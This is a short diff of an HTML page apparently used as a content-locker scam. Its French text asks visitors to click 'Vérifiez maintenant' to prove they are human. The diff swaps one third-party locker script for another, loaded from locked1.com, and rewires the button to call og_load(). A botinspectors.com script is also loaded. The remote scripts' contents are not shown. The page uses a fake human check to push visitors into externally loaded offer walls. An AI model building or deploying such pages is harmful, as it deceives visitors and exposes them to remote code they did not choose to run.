--- a/index.html
+++ b/index.html
@@ -24,10 +24,8 @@
 
 
 
-<script type="text/javascript">
-    var CPABUILDSETTINGS={"it":4200451,"key":"743e6"};
-</script>
-<script src="https://d3nxbjuv18k2dn.cloudfront.net/5a43e1a.js"></script>
+<script type="text/javascript" id="ogjs" src="https://locked1.com/cl/js/8dj1dk"></script>
+
 <script type="text/javascript" id="ogjs" src="https://botinspectors.com/cl/js/99xekr"></script>
 </head>
 <body onload="create()">
@@ -129,7 +127,7 @@
 <p>Tu as presque fini! Veuillez terminer cette dernière étape en cliquant sur le bouton ci-dessous et suivez toutes les instructions indiquées afin de vérifier que vous êtes un humain.</p>
 <div id="spiner" class="fas fa-spinner fa-spin"></div>
 
-<div id="b-1" onclick="_qd()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>Vérifiez maintenant</span></div>
+<div id="b-1" onclick=og_load(); class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>Vérifiez maintenant</span></div>
 
 </div>
 </div>
